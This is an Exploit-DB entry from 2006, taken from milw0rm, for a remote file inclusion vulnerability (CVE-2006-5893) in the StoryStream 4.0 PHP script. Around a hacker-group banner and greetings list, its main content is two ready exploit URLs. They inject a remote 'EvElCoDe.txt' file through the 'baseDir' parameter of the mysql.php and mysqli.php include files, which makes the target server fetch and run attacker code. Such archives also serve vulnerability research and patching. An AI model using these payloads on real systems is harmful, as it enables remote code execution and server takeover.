StoryStream 4.0 - 'baseDir' Remote File Inclusion

EDB-ID:

2767

CVE:

2006-5893

EDB Verified:

Author:

v1per-haCker

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-11-12

Vulnerable App:

#########################################################################################
################################### v1per-haCker
########################################
###################### How I Can lives Without FooL Programmer!
#########################
#########################################################################################
#=======================================================================================#
#___________________________________Storystream (RFI)___________________________________#
#=======================================================================================#
# Information:-                                                                         #
#                                                                                       #
# Scripts: Storystream                                                                  #
# download :    http://www.iwonderdesigns.com/downloads/storystream_beta_0.4.0.0.zip    #
# Version : 4                                                                           #
# Dork & vuln : download script and think :)                                            #
#                                                                                       #
#=======================================================================================#
# Exploit :                                                                             #
#                                                                                       #
#http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt?   #
#http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt?  #
#                                                                                       #
#=======================================================================================#
# Discoverd By : v1per-haCker                                                           #
#                                                                                       #
# Conatact : v1per-hacker[at]hotmail.com                                                #
#                                                                                       #
# XP10_hackEr Team              >>      www.xp10.com                                    #
# SpeciaL PoweR SecuritY TeaM   >>      www.specialpower.org                            #
#                                                                                       #
# Greetz to :   | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |		#
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |           #
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |           #
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |           #
#               |  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |           #
#                                                                                       #
# Thanks >>     /str0ke & www.milw0rm.com & www.google.com                              #
#=======================================================================================#
#########################################################################################
################################# L0ve is L1fe W0und3r
##################################
#########################################################################################

# milw0rm.com [2006-11-12]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services